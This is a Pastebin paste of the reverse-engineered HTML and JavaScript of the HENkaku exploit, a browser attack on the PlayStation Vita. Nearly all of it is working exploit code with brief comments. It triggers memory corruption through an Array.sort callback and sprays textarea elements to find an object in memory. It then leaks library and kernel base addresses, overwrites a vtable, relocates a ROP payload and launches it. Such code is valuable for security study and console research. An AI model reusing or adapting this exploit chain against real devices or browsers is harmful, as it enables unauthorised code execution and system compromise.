Guest User

Henkaku exploit - HTML reversed

a guest
Aug 1st, 2016
2,422
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script src='payload.js'></script>
  2.  
  3. <script>
  4. var r, a, e, t, n, o, l, i, f, v, s, c;
  5. var u, y, w, p, d, g, h, k, b;
  6. var A, U;
  7.  
  8. var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
  9. m /= 4; /* 476 */
  10.  
  11. var _dview = null;
  12.  
  13. /*
  14. Wrap two uint32s into double precision
  15. */
  16. function u2d(low, hi)
  17. {
  18. if (!_dview)
  19. _dview = new DataView(new ArrayBuffer(16));
  20.  
  21. _dview.setUint32(0, hi);
  22. _dview.setUint32(4, low);
  23. return _dview.getFloat64(0)
  24. }
  25.  
  26. /*
  27. Unwrap uints from double
  28. */
  29. function d2u(d)
  30. {
  31. if (!_dview)
  32. _dview = new DataView(new ArrayBuffer(16));
  33.  
  34. _dview.setFloat64(0, d);
  35. return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
  36. }
  37.  
  38. // Temporary space to store Element object
  39. var aspace_temp = new Uint32Array(1024);
  40.  
  41. var word1 = 0;
  42. var word2 = 0;
  43.  
  44. function swap(offset)
  45. {
  46. word1 = aspace32[offset/4];
  47. word2 = aspace32[offset/4 + 1];
  48. return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
  49. }
  50.  
  51. r = 0x4000;
  52. textareas = new Array(r);
  53. aspace_arr = new Array(r);
  54. t = 0x1344;
  55. n = 0x66656463;
  56. o = 0x55555555;
  57.  
  58.  
  59. for (var i = 0; i < aspace_arr.length; ++i)
  60. {
  61. aspace_arr[i] = new Uint32Array(0x1344/4);
  62. var e = document.createElement("textarea");
  63. e.rows = 0x66656463;
  64. textareas[i] = e;
  65. }
  66.  
  67. /*
  68. Spray memory with Element objects
  69. */
  70. for (var i = 0; i < 1024; ++i)
  71. {
  72. var e = document.createElement("textarea");
  73. e.rows = 0x66656463;
  74. textareas.push(e);
  75. }
  76.  
  77. var N = 0x3000;
  78. var W = Array.prototype.constructor.apply(null,new Array(0x3000));
  79. var j = 2048;
  80. var q = new Array(2048);
  81. var z = {};
  82.  
  83. var C = new Array(256);
  84.  
  85. z.toString = function()
  86. {
  87. W.push(12345);
  88.  
  89. for (var r = 0; r < C.length; ++r)
  90. {
  91. var a = Array.prototype.constructor.apply(null, q);
  92. a[0] = 0;
  93. a[1] = 1;
  94. a[2] = 2;
  95. C[r] = a;
  96. } return""
  97. };
  98.  
  99. W[0] = z;
  100. var G = u2d(0x80000000, 0x80000000);
  101.  
  102. for (var i = 1; i < 8192; ++i)
  103. W[i] = G;
  104.  
  105. W.sort();
  106. contents = "";
  107. cur = 0;
  108.  
  109. z.toString = function(){};
  110.  
  111. var I = null;
  112.  
  113. for (var i = 0; i < C.length; ++i)
  114. {
  115. if(C[i].length != j)
  116. {
  117. I = C[i];
  118. break;
  119. }
  120. }
  121.  
  122. var count = 0x20000000 - 0x11000;
  123.  
  124. for(; ; count--)
  125. {
  126. if(I[count] != 0)
  127. {
  128. _dview.setFloat64(0, I[J]);
  129.  
  130. if (_dview.getUint32(0) == t/4)
  131. {
  132. _dview.setUint32(0, 0xEFFFFFE0);
  133.  
  134. I[J] = _dview.getFloat64(0);
  135. _dview.setFloat64(0, I[J - 2]);
  136.  
  137. v = _dview.getUint32(4);
  138. _dview.setUint32(4, 0);
  139. _dview.setUint32(0, 0x80000000);
  140.  
  141. I[J-2] = _dview.getFloat64(0);
  142.  
  143. break;
  144. }
  145. }
  146. }
  147.  
  148. target_aspace = null;
  149.  
  150. for (var i = 0; i < aspace_arr.length; ++i)
  151. {
  152. if(aspace_arr[i].byteLength != t)
  153. {
  154. target_aspace = aspace_arr[i];
  155. break;
  156. }
  157. }
  158.  
  159. if (!target_aspace)
  160. {
  161. alert("failed");
  162. while(1){};
  163. }
  164.  
  165. var aspace32 = target_aspace;
  166. var fkvtable = v;
  167. f = v;
  168.  
  169. /*
  170. Find one of the sprayed Element objects in memory
  171. by looking for the rows of the object
  172. */
  173.  
  174. for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
  175. {
  176. if (aspace32[addr] == 0x66656463)
  177. {
  178. aspace32[addr] = 0x55555555;
  179. textarea_addr = addr * 4;
  180. found_element = true;
  181. break;
  182. }
  183. }
  184.  
  185. if (!found_element)
  186. {
  187. alert("Did not find Element signature");
  188. while(1){};
  189. }
  190.  
  191. /*
  192. Change the rows of the Element object then scan the array of
  193. sprayed objects to find an object whose rows have been changed
  194. */
  195.  
  196. var found_corrupted = false;
  197. var corrupted_textarea;
  198.  
  199. for (var i = 0; i < textareas.length; ++i)
  200. {
  201. if(textareas[i].rows == 0x55555555)
  202. {
  203. corrupted_textarea = textareas[i];
  204. found_corrupted = true;
  205. break;
  206. }
  207. }
  208.  
  209. if (!found_corrupted)
  210. {
  211. alert("Did not find corrupted textarea");
  212. while(1){};
  213. }
  214.  
  215. var vtidx = textarea_addr - 0x70;
  216. var textareavptr = aspace32[vtidx/4];
  217. scewkbase = textareavptr - 0xABB65C;
  218. scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
  219. scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
  220. p = swap(scewkbase + 0x85D2E4) - 0x22D65;
  221. d = swap(p + 0x2C688C) - 0x9E5;
  222. g = swap(d + 0x3BC4) - 0xDC2D;
  223. scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
  224. k = swap(g + 0x18BF4) - 0xD59;
  225. b = swap(k + 0x9AB8) - 0x49CD;
  226.  
  227. // Copy vtable
  228. for (var i = 0; i < 64; i++)
  229. aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];
  230.  
  231. aspace32[vtidx/4] = fkvtable;
  232.  
  233. // Save Element object
  234. for (var i = 0; i < 0x30; ++i)
  235. aspace_temp[i] = aspace32[vtidx/4 + i];
  236.  
  237. // Call setjmp
  238. aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;
  239.  
  240. // Undefine scrollLeft
  241. corrupted_textarea.scrollLeft = 0;
  242.  
  243. // Save payload address (jmp context)
  244. payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
  245. payload_addr -= 0xEF818;
  246.  
  247. // Restore Element object
  248. for (var i = 0; i < 0x30; ++i)
  249. aspace32[vtidx/4 + i] = aspace_temp[i];
  250.  
  251. payload_stack = payload_addr + 0x40;
  252. payload_code = payload_addr + 0x10000;
  253. payload_off = payload_addr/4;
  254.  
  255. // Build ROP payload
  256. for (var i = 0; i < payload.length; ++i,++payload_off)
  257. {
  258. // Reached the end of ROP header (first 0x770 bytes)
  259. if (i == 476)
  260. payload_off = payload_code/4;
  261.  
  262. switch(relocs[i])
  263. {
  264. case 0:
  265. aspace32[payload_off] = payload[i];
  266. break;
  267. case 1:
  268. aspace32[payload_off] = payload[i] + payload_stack;
  269. break;
  270. case 2:
  271. aspace32[payload_off] = payload[i] + scewkbase;
  272. break;
  273. case 3:
  274. aspace32[payload_off] = payload[i] + scekernbase;
  275. break;
  276. case 4:
  277. aspace32[payload_off] = payload[i] + scelibcbase;
  278. break;
  279. case 5:
  280. aspace32[payload_off] = payload[i] + g;
  281. break;
  282. case 6:
  283. aspace32[payload_off] = payload[i] + scenetbase;
  284. break;
  285. case 7:
  286. aspace32[payload_off] = payload[i] + b;
  287. break;
  288. default:
  289. alert("wtf?");
  290. alert(i + " " + relocs[i])
  291. }
  292. }
  293.  
  294. // Trigger ROPchain
  295. aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */
  296.  
  297. var rchainaddr = fkvtable + 0x100;
  298.  
  299. aspace32[rchainaddr/4 + 5] = payload_code;
  300. aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;
  301.  
  302. alert("Welcome to HENkaku!");
  303.  
  304. // Set scrollLeft to ROP chain
  305. corrupted_textarea.scrollLeft = rchainaddr;
  306.  
  307. alert("that's it");
  308. </script>
RAW Paste Data